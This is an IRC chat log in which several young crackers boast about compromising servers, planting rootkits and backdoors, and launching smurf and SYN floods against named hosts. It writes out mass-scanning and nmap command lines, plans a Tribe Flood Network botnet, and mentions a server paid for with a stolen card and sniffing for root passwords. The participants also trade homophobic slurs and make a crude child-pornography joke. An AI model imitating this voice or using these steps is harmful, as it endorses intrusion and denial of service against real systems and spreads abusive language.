GOOD REASON :D1ck! :THATS A GOOD REASON :D1ck! :THATS A GOOD REASON :D1ck! ::P :D1ck! :oye :D1ck! :scan kya "did you scan?" :D1ck! :? :D1ck! :cool :D1ck! :???? :D1ck! :??????????????? :D1ck! :???????????????????????? :J4n3! :when u do smurf attack, then ppl come back soon , i mean jaldee up hojathay hain jaldee = quickly :D1ck! :??????????????????????????????? :J4n3! :lekin syn attack main tho gayeb hee hojathay hain "but they disappear in a syn attack" :D1ck! :?????????????????????????????????????? :D1ck! :smurf sucks :J4n3! :khamoshi ek gantay say down hai phir up nahin huwa "khamoshi (the word means silence, but used here as a server name, i guess) is down since one hour, and not yet come up" :J4n3! :jub wo ping time out huwa tha thub mainay attack chor diya i mean rok liya "when the ping timed out, i stopped the (ongoing) attack" :D1ck! :smurf is only good if u have a VIRGIN and tyte ip file, with duals routers in it :J4n3! :lekin phir bee up nahin huwa abee thak "but still it is not up till now" :J4n3! :yeahhh :J4n3! :syn rox :D1ck! :hehe :J4n3! :i did ./z0ne -clo in > in & .in is the TLD for indian sites :J4n3! :heh i do it with 8 boxes , satyanaas hojatha hai "i do it with 8 boxes, creates sheer destruction" :D1ck! :how do u scan syn with iplist? :D1ck! :./synscan INDIA.log :D1ck! :u can do that????? :D1ck! :lol :D1ck! :;) :D1ck! :i do it with 35 boxes :D1ck! :(i`m talking about when i had roots) :D1ck! :now i have 4 roots :D1ck! ::( :D1ck! :or soem thing :D1ck! :: :D1ck! ::) :D1ck! :coz i`m now towards coding. :D1ck! ::P :D1ck! :for a while :D1ck! :heh :J4n3! :huh :J4n3! :good :J4n3! :naa i'm donig z0ne on india :J4n3! :then will do ./synscan in.log in eth0 100 53 :D1ck! :kewl :J4n3! ::) :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck! : jeje :D1ck! :oh :D1ck! :god :D1ck! :look who is here :m4ry! :yo :m4ry! :faw :m4ry! :code 33 :D1ck! :lahore :D1ck! :? :D1ck! :m4ry :D1ck! :m4ry :D1ck! :ah :D1ck! :hehehe :m4ry! :lahore owns yew :m4ry! :WOL :D1ck! :hehehe :D1ck! :man :m4ry! :scan it for me :m4ry! :my cuz is outta hours :m4ry! :the admin to my NS finally logged in :D1ck! :this is the first time i`ve seen u on IRC at 1 am :D1ck! :this is the first time i`ve seen u on IRC at 1 am :m4ry! :haha :D1ck! :hahaha :m4ry! :my cuz has O'levels :m4ry! :and he's online rightn ow :m4ry! :so Sup :D1ck! :LOL :D1ck! :not much :D1ck! :bored :D1ck! :oh :D1ck! :owned example net's NS :D1ck! :but lost it that very second :D1ck! ::/ :m4ry! :oh :m4ry! :btw :m4ry! :btw :D1ck! :6 am :m4ry! :add a examplenet acct for me :D1ck! :they were in :m4ry! :i can use ithere :D1ck! : :D1ck! :i dont have example, any more :m4ry! :ithere = it here :D1ck! ::/ :m4ry! :also, contact Rdog, tell him to add a account on the Gilgit Comsats server :m4ry! :i can use that here as well :D1ck! :i juped diz :D1ck! :and #delusion almosr got purged :m4ry! :i lost 2 more linux ooxes :/ :m4ry! :LOL :m4ry! :aww :m4ry! :RR..? :D1ck! :hehe :D1ck! :Rdog? :m4ry! :get it purged man :D1ck! :he wants ISP's :m4ry! :DoS rapt0r/pr0be :D1ck! :frtom me :D1ck! ::p :D1ck! :i will :) :D1ck! :hehe :m4ry! :lol :D1ck! :yep :m4ry! :add the damn accounts :m4ry! :and let me know :D1ck! :i ookover 4 diz's boxes :m4ry! :and btw, the example admin is a chick :D1ck! :oki :m4ry! :aain? :P~ :m4ry! :again? :P~ :D1ck! ::P~ :D1ck! :gegege :D1ck! :yep :D1ck! : again? :P~ :D1ck! :yep :D1ck! :owned 4 .uk :D1ck! :'s :m4ry! :keep Diz's boxen :D1ck! :he is lame :m4ry! :i'll gety started on the SunOS version of TFN :D1ck! :his pass was 'fuck111' :D1ck! :hehe :D1ck! :ok :D1ck! :good. :m4ry! :we'll have the bifiggerst FN in the world :m4ry! :since ADM :m4ry! :lol :D1ck! :yep :m4ry! :he's lame :D1ck! :jane got 20000+ :m4ry! :his pass was 'jusjesus' last time :D1ck! :hehe :m4ry! :(that's what faisal told me) :m4ry! :and u told me :D1ck! :jane + m4ry + rave + dick :D1ck! :oh god :D1ck! :bandwith :D1ck! :hahahaha :D1ck! :nope :m4ry! : = Major FN :m4ry! :shit :m4ry! :i hate this :m4ry! :keyboard :J4n3! :save2 add J4n3 * J4n3 100 1 4 :J4n3! :save2 add d1ck * d1ck 100 1 4 :D1ck! :are u in BX? :m4ry! :J4n3 :m4ry! :sup :m4ry! :d00d :m4ry! :man i'm hungry :J4n3! :save2 add m4ry * m4ry 100 1 4 :J4n3! :m4ry :p :D1ck! :hahaha :m4ry! :yeah :m4ry! :BX :m4ry! :from24.* box :m4ry! :pretty fast :D1ck! :order a pizza :J4n3! :save2 save :m4ry! :T1 i think :D1ck! :hehe :J4n3! :save2 nick Canopus :D1ck! :yep :m4ry! :0-usage :m4ry! :the admin logs in wvery once in a while to run his sweet oracle :D1ck! :m4ry: when u coming back to khi? :m4ry! :prolly a week or so :m4ry! :u checked out the new kernel (2.2.15)? :D1ck! : lol :D1ck! : ratios suck ass that's why :D1ck! : try #cracks here on undernet :m4ry! :well :D1ck! :FUCK DOGGY :m4ry! :new isn't exactly true :D1ck! :SUCKING UOP LINUXSEX'S BALLS :D1ck! :$#%#@ :m4ry! :LOL :m4ry! :DoS him :m4ry! :kick/ban him :D1ck! :m4ry: nope, is it stable? :D1ck! :the kernel :D1ck! :hahaha :m4ry! :DAMN L33T KERNEL :m4ry! :get it :m4ry! :16 megs worth the download :D1ck! :kewl :J4n3! :save2 .add D1ck * D1ck 100 1 4 :D1ck! :ok i will :m4ry! :i was wondering :m4ry! :do you want to merge K1dd13 and tr1be? :m4ry! :all local guys :m4ry! :u can deal with the stupid people :m4ry! :kick them out :m4ry! :talk with faisal :m4ry! :paw :D1ck! :no merge :m4ry! :./clear :P~ :D1ck! ::P :m4ry! :ok :m4ry! :no merge :D1ck! :parents? :m4ry! :undetstood :m4ry! :understood :m4ry! :yeah :m4ry! :aunties :D1ck! :cool :m4ry! :get a husmail account :m4ry! :www.hushmail.com :m4ry! :damn l33t :D1ck! :ah :D1ck! :hahaa :D1ck! :ARW :D1ck! :lol :D1ck! :okies :m4ry! :encrypted email from user-to-user (of husmail only) :D1ck! :hetaaz: i`m geting k1dd13-online.org :D1ck! :m4ry :m4ry! :haha :D1ck! :check this :m4ry! :l33t :m4ry! :yeah..? :D1ck! :www9.example.com/k1dd13 :D1ck! :and :D1ck! :www9.example.com/k1dd13/Article3.html :D1ck! :and :D1ck! :0-day section coming up :D1ck! :password protected :D1ck! :just for u me jane rave and bob :D1ck! :in smaller versionm just for #k1dd13 :D1ck! :hehe :D1ck! ::) :m4ry! :l33t :D1ck! ::) :m4ry! :MAN :m4ry! :get PGP :m4ry! :mail me ur PGP key :m4ry! :ripgut@example.net :D1ck! :ok :m4ry! :pgp owns you :D1ck! :CERT.ORG? :m4ry! ::) :D1ck! :hehhe :m4ry! :what about cert? :D1ck! :ok i`ll get it? :D1ck! :ok i`ll get it :m4ry! ::) :m4ry! :yeah :m4ry! :do that :D1ck! :btw :D1ck! :www.example.com owned by rootworm :D1ck! :JP SUX :D1ck! :$@ :m4ry! :NO WAY :D1ck! :JP = qu33r :D1ck! :heh :m4ry! :COOL :D1ck! :yep :m4ry! :JP is gay :m4ry! :known fact :m4ry! :he fucked his dad :D1ck! :yep :D1ck! :fucked his dad? :D1ck! :how/why/what/when :D1ck! :? :m4ry! :shit :m4ry! :i'm out :m4ry! :aunty needs fone :m4ry! :only 1 fone :/ :D1ck! : wow :D1ck! :HAHAHAHAHAHA :D1ck! :Time 10:55 m4ry on chat, mom at back :D1ck! :HAHAAHAHAHAHHAHAHAH :J4n3! :LOOOOOOOOL :J4n3! :what a h4x0r :D1ck! ::p :D1ck! :keke :D1ck! :d4v3 :D1ck! :done with password.html :D1ck! :? :D1ck! :i`m getting LEET 0-day section :D1ck! ::) :J4n3! :kewl wait 30 mins plz :J4n3! :kuch panga horaha hai set kartha hon "some nonsense is going on, i am trying to set it" :D1ck! :oki :J4n3! :lekin masla doosra h ia "but the reason is something else" :J4n3! :mujay yaad hee nahi raha "I havent been able to remember" :J4n3! :abee tho meray system par sahi chal jayega lekin "For now, it will run from my system" :J4n3! :i think example.com doesn't give u authority to run cgi :D1ck! :oh :J4n3! :we have to put a java encryption :D1ck! :oh :D1ck! :oki :D1ck! ::( :J4n3! :don worry i'll put a tight java wait :D1ck! :oki :J4n3! :i'm on java archieve page, lemme select one :D1ck! :oki :D1ck! :J4n3 :D1ck! :how manys :D1ck! :boxes intotal u have? :J4n3! :40 sparc :J4n3! :and donno about linux :D1ck! :wow :D1ck! :cool :J4n3! :i rmoved x86's from my list :J4n3! :coz dont have rootkit :D1ck! :shit :J4n3! :but till tomorrow i'll have 70 sparc's :D1ck! :u should have given them to meh :D1ck! ::P :D1ck! :coooool :J4n3! :hmmm :( :D1ck! :./synscan 61 61.log eth0 100 111 & :J4n3! :don worry i'll give them to u now on :D1ck! :w00p :J4n3! :hehe :D1ck! :hehehe oki :J4n3! :oye :J4n3! :u know what :D1ck! :yeah? :D1ck! :what? :D1ck! :???? :J4n3! :i did that synscan from j0e's box :D1ck! :yep and? :J4n3! :and he got emails from all edu's and too many severs :J4n3! :shit he's wondering who did it it seems they are using their buddies' boxes to do syn scans :D1ck! :HAHAHAHAHA :J4n3! :lol :D1ck! :kik' :D1ck! :lol :J4n3! :i removed all directorys from there :J4n3! :hehehe :D1ck! :worldtel would be flooded with mailks :D1ck! :user 'shahvez' :D1ck! :user' d4v3' :D1ck! :hahahahaha :D1ck! :okki :D1ck! :give me access to his server :D1ck! :i ferg0t the pass :J4n3! ::/ :D1ck! : :D1ck! ::( :J4n3! :he changed the root pass :J4n3! :and closed all logins :D1ck! :not the root :D1ck! :local :D1ck! :desire? :D1ck! :closed? :J4n3! :yeah desire is also not working :D1ck! :wtf? :D1ck! :thats gay :J4n3! :he said he'll open it tomorrow :J4n3! :not the others but mine :D1ck! :why is he acting like he pays for the server? :J4n3! :no yaar he's jigar ,he's just worried :D1ck! :hmmmmm :J4n3! :actually he called me, tonight :D1ck! :kk :J4n3! :and dont have electricity , he said as soon as i get it on i'll open ur account :J4n3! :no actually he bought that server legally :J4n3! ::) :D1ck! : no actually he bought that server legally :D1ck! :WHAT? :D1ck! :u told me :D1ck! :that :D1ck! :he carded it@ :D1ck! :?????? :J4n3! :yup he did :J4n3! :but now he sent payment when he got email that the CC denied to pay :D1ck! :oh :D1ck! :LOL :D1ck! :ok :J4n3! :hehe he's in business mood :J4n3! :to run shell and bnc's :D1ck! :oh :D1ck! :he's a nice guy? :J4n3! :yeah he is :J4n3! :he is jigar yaar :D1ck! :cool :J4n3! :D1ck u on windows ? :D1ck! :nope :D1ck! :lInUX:( :D1ck! :i`m thinking of coding some thing :D1ck! :gonna write code for gethostname() :D1ck! :so i can use scan :J4n3! :: Multiple User Name and Password :J4n3! :Set up multiple username and passwords for members: :J4n3! :Add the code to your "enter" page, if they get it wrong, they stay, if they get it right, they can go it. You can set up multiple username and password in the script, like a member list. :D1ck! :and mass ath0 :J4n3! :hmmm kewl :) :D1ck! :kewl :D1ck! : :D1ck! ::))))) :J4n3! ::)) :J4n3! :there r some others lemme check them :D1ck! :m4ry :m4ry! :D1ck :m4ry! :PAW :m4ry! :FAW :m4ry! :the works :D1ck! :hehe ok :D1ck! :;) :m4ry! :everything AW :D1ck! :Hi FREIND :D1ck! :HI AUNTI :m4ry! :i need symetrix's number :m4ry! :LOL :m4ry! :SHUTUP :D1ck! :hahahahaha :m4ry! :go ask someone in #LinuxSEx for their phphone number :m4ry! :i need to call someone int he US :m4ry! :check if dialpad works :m4ry! ::/ :m4ry! :i called CERT :D1ck! :lemme ask sym? :D1ck! :hahahahaha :D1ck! :what did they say? :m4ry! :some faggot picked up and he sounded q ueer so i closed it :D1ck! :HAHAHAHAHAHA :m4ry! :seriously.. no joke :m4ry! :i think he was JP or someone :m4ry! :go ask sym :D1ck! :lame diz is online :m4ry! :or MadCamel :D1ck! :hahaha :m4ry! :or anyone :m4ry! :lol :D1ck! :hehehe :m4ry! :Dos him :D1ck! :no one's on :m4ry! :shiat :D1ck! :and i aint speaking in #linuxsex :D1ck! :OR :D1ck! :sysop :D1ck! :will eat my heaf :D1ck! ::( :D1ck! :head :m4ry! :LOL :m4ry! :LOL :m4ry! :Sysop .. :m4ry! :sigh :m4ry! :talk to him :D1ck! :hahaha :m4ry! :tell him ur really sorry etc.. :m4ry! :SN1P3R :D1ck! :he lives in romania :m4ry! :GO TO THE US RIGHT NOW AND GIVE ME UR PHONE NUMBER :D1ck! :??? :m4ry! ::-x :m4ry! :(gasp) :D1ck! :HAHAHAHA :D1ck! :are u feeling ok? :D1ck! :wtf is gasp :m4ry! :man :m4ry! :these guys are eating my head :m4ry! :i had to fix their modem, sound card, speakers, mic :D1ck! :nam :D1ck! :who? :m4ry! :nwo they want me to get dialpad woo work :D1ck! :HAHAHAHAHAHAHAHAHAHAHAHAHAHA :m4ry! :mamo's :m4ry! :house :D1ck! :LOL :D1ck! :ROFL :D1ck! :oh :D1ck! : :D1ck! :ROFL :D1ck! :elite HACKER m4ry;) :D1ck! :HEATAZ :m4ry! :DEATHaCeS ? :m4ry! :jupe? :D1ck! : CAN U FEEL TH BLINK :D1ck! :? :D1ck! :yeah :m4ry! :hacker my foot :D1ck! :jupe :m4ry! :nah :m4ry! :non-ansi terminal :D1ck! :hahahah :m4ry! :vt100 owns yew :D1ck! :oh :D1ck! ::/ :m4ry! :it sux :D1ck! :TERM=elitehackers :m4ry! :black & white :D1ck! :telnet 127.0.0.1 :D1ck! :bash# :D1ck! :lol :D1ck! :get mIRC :D1ck! :#$@#$@#$ :m4ry! :i have it :m4ry! :i hate it :m4ry! :but it's really fucked up :D1ck! :oh :D1ck! :use it :m4ry! :DALnet :D1ck! :hahaha :m4ry! :all lahories go to DALnet :m4ry! :buncha faggots :D1ck! :heh :D1ck! :LOL :D1ck! :faggots :D1ck! :#ph33r-the-b33r == dalnet :m4ry! :Lahore = GAY land :D1ck! :#ph33r-the-b33r == dalnet :D1ck! :BWHAHAHA :D1ck! :LAHORE = ultra gay :m4ry! :i met rave- on Darknet :D1ck! :yep :m4ry! :EFnet :m4ry! ::) :D1ck! :Interesting ports on ns3.example.net.xx (192.168170.1.99): :D1ck! :Port State Protocol Service (RPC) :D1ck! :32892 open tcp (rusersd V2-3) :D1ck! :we were hanging in #k1dd13 for a while :D1ck! :on efnet :D1ck! ::P :m4ry! :scan UDP (same port range) to find sadmind :m4ry! :get example mail server :m4ry! :and man :m4ry! :PLEASE :m4ry! :scan this WOL shit :D1ck! :nmap -PS80 -sR -sS $1 -p 32000-33000 :D1ck! :$1=argv[1] :D1ck! :hahaa :m4ry! :com192.168 :m4ry! :192.168 :m4ry! :.*.* :m4ry! :;) :D1ck! :well :D1ck! : HEHE :D1ck! :LAME MOFO :D1ck! : :D1ck! :<_cen:#Linuxsex> :) :m4ry! :or just add a example zccount :D1ck! :cen == tc :m4ry! :the WOL guys are stupid :D1ck! :MAN i lost example :D1ck! : :m4ry! : ircname : boo hoo griddypoo :m4ry! :| channels : +#LINUXSEX :m4ry! :LOL :m4ry! :(_cen) :D1ck! :gegege :m4ry! :haww :m4ry! :u lost example? :m4ry! :how? :m4ry! :why :m4ry! :when :m4ry! :where :D1ck! :g :D1ck! :hehe :m4ry! :WHY :m4ry! :WHYYYYY :m4ry! :i need 3r33t-hax0r hours :D1ck! :coz :D1ck! :rlogin was fucked :D1ck! :i dint have a login.trj :m4ry! :use vortex :m4ry! : :D1ck! :HAHAHAHAHAHHA :D1ck! :k :m4ry! :ok :m4ry! :now i gotta sleep :m4ry! :my cuz has exams tommorow :D1ck! :i never tried vortex :D1ck! :LOL :m4ry! :and we all sleep in the same room *yuck* :D1ck! :ok :D1ck! :cya :D1ck! :hahaha :m4ry! :vortex owns ou.. i got back firewalled hosts from that :D1ck! :*LOL* :m4ry! :all ports firewalled (TPCP) except for port 1-1024 :D1ck! :kewl :D1ck! :hahhaa :m4ry! :ok :m4ry! :i'm out :D1ck! :k :D1ck! :go :D1ck! :run :D1ck! :bye :D1ck! : :m4ry! :i would detach BX, but this SunOS version really fucks up and doesn't re-sttae-attack :m4ry! :attatch :m4ry! :attach :D1ck! :hahhaa :D1ck! :do it :D1ck! : /detach :D1ck! : /detach :D1ck! : /detach :m4ry! :sigh :m4ry! :ok :m4ry! :or nevermind :D1ck! : /away detached :m4ry! :i need to add a user :m4ry! :viper :m4ry! :to get better ident :) :D1ck! :hehe :m4ry! :bye :D1ck! :ok :D1ck! :bye :D1ck! : SignOff m4ry: :D1ck! :fuck :D1ck! :J4n3 :D1ck! :the box i owned .xx :D1ck! :i saw h4r33 logging in with root/owned :D1ck! :but i dont use root/owned :D1ck! :so its his box :D1ck! :HAHAHAHAHA :D1ck! :lamah :D1ck! :brb :D1ck! :yo :D1ck! :J4n3 :D1ck! :there? :D1ck! :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck! :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck! :dos_ nic dns-gov :D1ck! :dos_ nick dns-gov :D1ck! :dos__ nick ^6thsense :D1ck! :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck! :_EATHaCeS nick jupe-bot :D1ck! :__ATHaCeS nick jupe2-bot :D1ck! :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck! :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck! :dos_ nick k-rad :D1ck! :dos__ nick hyper :D1ck! :dos___ nick teardrop :D1ck! :dos___ nick pepsi :D1ck! :dos____ nick pepsi :D1ck! :DoS____ nick pepsi :D1ck! :dos_ :D1ck! :dos_ say hehe :DoS_! :hehe :D1ck! :dos__ say hehe :D1ck! :dos___ say hehe :DoS___! :hehe :D1ck! :dos____ say hehe :DoS____! :hehe :D1ck! :dos_ nick k-rad- :D1ck! :dos___ nick neat :D1ck! :dos____ nick bawt :D1ck! :dos____ nick TotalKaoS :D1ck! :dos____ nick Tota1KaaS :D1ck! :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels USER werd . . :DoS =- Day 05 June 8 :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :J4n3 :errrrrrr :J4n3 :why banned ? :( :D1ck :? :D1ck :oh :J4n3 :heh id id :D1ck :i thouh :D1ck :oh :D1ck ::) :D1ck :d4v3 :J4n3 :haha k :D1ck :i lost my NS :D1ck ::( :J4n3 :listen :D1ck :): :D1ck :? :J4n3 :oh shit :J4n3 :bad very bad :D1ck :?? :D1ck : listen :D1ck : listen :D1ck : listen :D1ck :? :D1ck :example.com.pk,example.net, example.com :D1ck :J4n3 :D1ck :user192-168-74-106.example.net :D1ck :bsd.example.com :D1ck :is.the.fresh.prince.of.hardcore.example.xx.us :D1ck :dos those 3 :D1ck :please :D1ck : :D1ck :PLEASE :D1ck :PLEASE :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck :? :D1ck :Inspectah :D1ck :inst :J4n3 :d1ck :J4n3 :.up :J4n3 :[ b-a-c-k ] :m4ry :i hate this place :m4ry ::) :J4n3 :[ frozen ] [ Auto-away after 15 mins - 00:01:41 ] - [J4n3-X] [1.0] :J4n3 :[ frozen ] [ Auto-away after 15 mins - 00:01:41 ] - [J4n3-X] [1.0] :J4n3 :.up :D1ck :.op :D1ck :mop :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :Sp07 :suck :Sp07 :dick :Sp07 :and :Sp07 :die :D1ck :heh :D1ck :man :D1ck :i lost 2 NS$@$ :D1ck :right nw :Sp07 :that :Sp07 :sucks :Sp07 :dick :D1ck :5 minutes :D1ck :some moron tookover :Sp07 :fucking #7thsphere can never get x/w :Sp07 :how fucking gay :D1ck :and his kit overwrote all my backdoors :D1ck :hahahaha :D1ck :x/q == gay :D1ck :x/w == gay :Sp07 :[03:50] Sp07, I did answer your question. If you know so much, I can't help you anymore. :) :Sp07 :what a little bitch :Sp07 :hehe :D1ck :HAHAHAHA :D1ck :#cservice :D1ck :#zy :D1ck :#zt :D1ck :gay :D1ck :@@@@@@@@@@@@ :D1ck : :Sp07 :i was asking them if 7thsphere can be registered :Sp07 :they said no its a "war program" :D1ck :hahahaha :Sp07 :what a fucking moron :D1ck :LOl :D1ck :fuck my mood's off :D1ck :coz i saw some morons nick :Sp07 :? :D1ck :'D1z4574 :Sp07 :[03:52] Sp07, I did help you. #7thsphere will NEVER be removed from the blacklist :D1ck :'D1z4574' :Sp07 :hahaha :D1ck :ROFLAMO :D1ck :Sp07 :D1ck :i`m leeeet :D1ck : :D1ck ::) :Sp07 :[03:52] why will it be never removed/ :Sp07 :[03:52] ? :Sp07 :[03:52] cause your too lazy to take it off? :D1ck :HAHAHAHHAHAHA :D1ck :+b :D1ck :? :Sp07 :[03:53] *** You were kicked from #CSERVICE by X ((RWI) Too lame to be on IRC) :Sp07 :hehe :D1ck :lol :Sp07 :let me message that whore :D1ck :./dso :D1ck :./dos :D1ck :oki :Sp07 :not yet :Sp07 :ill dos him :Sp07 :after im done talking to him :D1ck :oki :D1ck :say 'dont mess with #delusion' :D1ck :hahaha :D1ck :or i`ll dos j0h :D1ck :man :D1ck :hm :Sp07 :did you hack any irix? :D1ck :irc sucks :Sp07 :Sp07 is ~Sp07@delta.example.edu * ? :D1ck :i`m bored :Sp07 :yep :D1ck :nop :D1ck :i tried :D1ck :it hangs :D1ck ::) :D1ck :Sp07 :D1ck :help m :D1ck :me :Sp07 :? :D1ck :192.168.1.22 => ns2.example.net [21] :D1ck :USER root :D1ck :CWD ~meltahir :D1ck :PORT 192,168,1,22,149,231 :D1ck :LIST mod* :D1ck :TYPE I :Sp07 :ACTION helps d1ck :D1ck :PORT 192.168,1,22,149,232 :D1ck :TYPE A :D1ck :NLST mod_perl-1.24.tar.gz :D1ck :what the fuck? :Sp07 :thats h4r33s shell :Sp07 :hehahaha :Sp07 :e :D1ck :thats the root pass for ns2.example.net ? :Sp07 :no :D1ck :nope its not :D1ck :its on a subnet :D1ck :then? :Sp07 :then? :Sp07 :I dunno :Sp07 :where are you sniffing from? :Sp07 :umm doesnt it have to be the same network? :D1ck :tango.example.com :D1ck :dunno :Sp07 :192.168.1.1 192.168.1.10 :Sp07 :yeah :Sp07 :just wait :Sp07 :and I think you wioll get someones password :D1ck :oki :Sp07 :I got that sometimes :Sp07 :where it wouldnt show the password :Sp07 :or when it wouldnt show user and pass :Sp07 :some fucker was dosing me today =( :D1ck :oh :Sp07 :some pussy :D1ck :haha :Sp07 :was it you? :D1ck :weeeeeena :Sp07 :j/k :D1ck ::( :Sp07 :they dosed my friends shell :D1ck :OH Sp07 :D1ck :potheads.com? :Sp07 :but when I got on this I dont think they could dos it no mor :Sp07 :yeah :Sp07 :.net :D1ck :make me a VHOST :Sp07 :I cant :D1ck :h4r33.is.a.fucking.example.com :Sp07 :thats a good thing :Sp07 :heeh :D1ck :h4r33.and.grid.are.fucking.example.com :D1ck :hehe :Sp07 :why you complimenting him?? :Sp07 :im a pothead :Sp07 :hehe :D1ck :oh :D1ck :what does it mean btw :P :D1ck :? :Sp07 :someone who smokes lots of weed :Sp07 :hahaha :Sp07 :pot-heads :Sp07 :pot = weed :D1ck :oh :D1ck :i get tons f weed :D1ck :but :D1ck :i dont do it :Sp07 :heh :Sp07 :not weed in your garden or anything :Sp07 :the drug :Sp07 :s :Sp07 :drug weed :Sp07 :I got some weed with me right now :D1ck : 192.168.1.22 => ns2.example.net [21] :D1ck :USER root :D1ck :CWD ~meltahir :Sp07 :but I cant smoke it cause my dads here :D1ck :man :D1ck :wtf is that? :Sp07 :cwd :Sp07 :that is like :Sp07 :umm :D1ck :haha :Sp07 :cd ~meltahir :Sp07 :like its a directory :D1ck :oh :D1ck :ah :D1ck ::) :D1ck :ok :Sp07 :its not his password hehe :Sp07 :[04:06] Hackers and crackers wanna help us in #pakt ?? We need to hack the undernet and the fucking lame opers come join and ask |W|-|G| for more info, thanks for your help.. KILL THE UNDERNET :Sp07 :hahaha :Sp07 :lets go dos all of them :D1ck :hahahahaha :Sp07 :they kicked me =( :D1ck ::) :Sp07 :we need to do something on irc that will make us money :D1ck : i help pakt out with the reporting of child pornographers :D1ck :AHAHAHAHAHA :Sp07 :ns3.example.net :D1ck :I WANT KIDDIE PORN :Sp07 :thats h4r33 :D1ck :yeah i know :Sp07 :ACTION slaps sximap around a bit with a large trout :Sp07 :oops :D1ck :rofl :D1ck :man :D1ck :i`m hunguhry :Sp07 :go eat :D1ck :its 4 am :Sp07 :go hunting :D1ck :and kithen is downstair :Sp07 :go hunt for some cockroaches :D1ck ::( :D1ck :rofl :Sp07 :mmMMmMMmmmmm :Sp07 :m :D1ck ::) :D1ck :? :D1ck :MY LINUX MECHS ROCKS :D1ck :%$#@ :D1ck :i lost my 90 day uptime box :D1ck ::( :Sp07 :heh :Sp07 :ITS ALMOST TIME FOR ME TO SMOKE SOME WEEED :Sp07 :noddles? :Sp07 :hehe :D1ck :hahaa :D1ck :hehe :D1ck ::) :Sp07 :isnt it neat :Sp07 :eat :Sp07 :hehe :Sp07 :you think too much about food :D1ck ::) :D1ck :i`m FAT :D1ck ::) :D1ck :hehe :Sp07 :forr eal? :Sp07 :heh :Sp07 :you fat ass :D1ck :dont taunt me :( :Sp07 :how much do you weigh? :D1ck :): :Sp07 :sorry :D1ck :400 :D1ck :400 :D1ck :np :Sp07 :lol :D1ck ::) :Sp07 :for real :D1ck :oh well 300 :D1ck ::) :Sp07 :how much do you weight? :D1ck :for real :D1ck :300 punds :Sp07 :for real? :D1ck :yes :Sp07 :you serious? :D1ck :for real :D1ck : :D1ck :yep :D1ck ::) :D1ck :serious :Sp07 :dont lie :Sp07 :hehe :D1ck :i`m FAT :Sp07 :300 is a lot :D1ck :as :D1ck :s :D1ck ::) :D1ck :nope i`m 300#$@ :Sp07 :how old are you? :D1ck :17 :D1ck :;> :Sp07 :DAMN :Sp07 :hehe :D1ck :kaos_ nick jupe :Sp07 :DAYUMMMMM :D1ck :kaos_ nick jupah :D1ck :.save :D1ck ::) :D1ck :welp, i`ll lose it :Sp07 :DAYYYYYYYYUMMMMMMMMMMMMMMMMMMM :Sp07 :M :Sp07 :does that look like H OR M? :D1ck :hahaa :Sp07 :H M :D1ck :dude :D1ck :4 years back :Sp07 :H M :Sp07 :H M :D1ck :i was 400 :D1ck :and then i lost 200 :Sp07 :DAYUMMMMMMMMM :Sp07 :you liar :D1ck :nutriotion :D1ck :and then :Sp07 :how can you be 400 pounds when your 13? :D1ck :I WAS :Sp07 :you liar :D1ck :tendency :D1ck :and :D1ck :lots of eating :D1ck :but then i left the diet and excersise :D1ck :but i`ll loose it again :D1ck :i`m serious now :D1ck ::) :Sp07 :400 is too much for a 13 year old :D1ck :when i`m serious imake sure to achieve the goal :Sp07 :maybe like 200 is cool :Sp07 :but 400 :Sp07 :no way :D1ck :hahahaha :Sp07 :200 is still fat but 400 is like a fucking elephant :Sp07 :ehhe :D1ck :yep :Sp07 :I weigh like 150 right now :D1ck :200 with my height is all good. :D1ck :i`m 6,3 :D1ck :i`m 6.3 :Sp07 :your like twice as big as me :Sp07 :as in pounds :D1ck :lol :Sp07 :hehe :D1ck :i`m twice as big as 80% of the ppl :Sp07 :im like 5'8 I think :D1ck :in this world :D1ck ::) :D1ck :oh :Sp07 :thats humungus :Sp07 :hehe :D1ck :GIGANTIC :Sp07 :gorganic :Sp07 :TITANIC :D1ck : hahha :Sp07 :for real how much do you weigh?? :Sp07 :hehe :D1ck :300 :D1ck :i`m serious damit :Sp07 :DAYUMMMMMMMMMM :Sp07 :N :D1ck :i eat the whole fucking day with no excersise :D1ck ::) :Sp07 :N H M :Sp07 :those 3 letters look the same :D1ck :i`ll get lYPO sUcKtiON :Sp07 :i dont excercise that much too :Sp07 :but I dont weight that much :D1ck :<= tendancy :Sp07 :whats tendancy mean :D1ck :U ARE A AMERICAN AND I SPEAK BETTER ENGLISH THEN U? :D1ck :HEHEHEHE :D1ck : whats tendancy mean :Sp07 :hehehe :Sp07 :whats it mean? :D1ck :tendency mean that u have that inner inheritance :D1ck :to get BIG :D1ck ::) :Sp07 :oh :D1ck :u cant help :D1ck :u have to work VERY VERY hard :D1ck :i`m targetting to lloose 60 pounds :D1ck :in 2 months :D1ck ::) :Sp07 :me too :D1ck :how much u weigh :D1ck :? :Sp07 :i want to lose 100 pounds in 2 months :Sp07 :I weight 400 pounds :D1ck :haha :D1ck :LOL :Sp07 :hehehe :D1ck :seriously, i`m not joking :D1ck : :Sp07 :me too :D1ck :=p :D1ck :hehe k :D1ck :ure smart :Sp07 :thanks :Sp07 :herhe :D1ck :np :D1ck :heh :Sp07 : :Sp07 : :D1ck :so sup :Sp07 : :D1ck : :D1ck :? :D1ck : :D1ck : :Sp07 :MY DICK :D1ck :OH :D1ck :CAN I HAVE A GO :Sp07 :I WANT TO SMOKE WEED :D1ck :OR U WANT THE OTHE RGUY FIRST :D1ck :? :Sp07 :NO :D1ck :WEE :D1ck :WEED :D1ck :WEED :D1ck :WEED :Sp07 :WEEEEEEEEED :D1ck :what if the cops bust u :D1ck :??????? :Sp07 :NOT IF I SMOKE AT MY BACKYARD :Sp07 :HEHE :Sp07 :THEY WONT BUST ME :D1ck :HEHEH :D1ck :well :D1ck :my freind 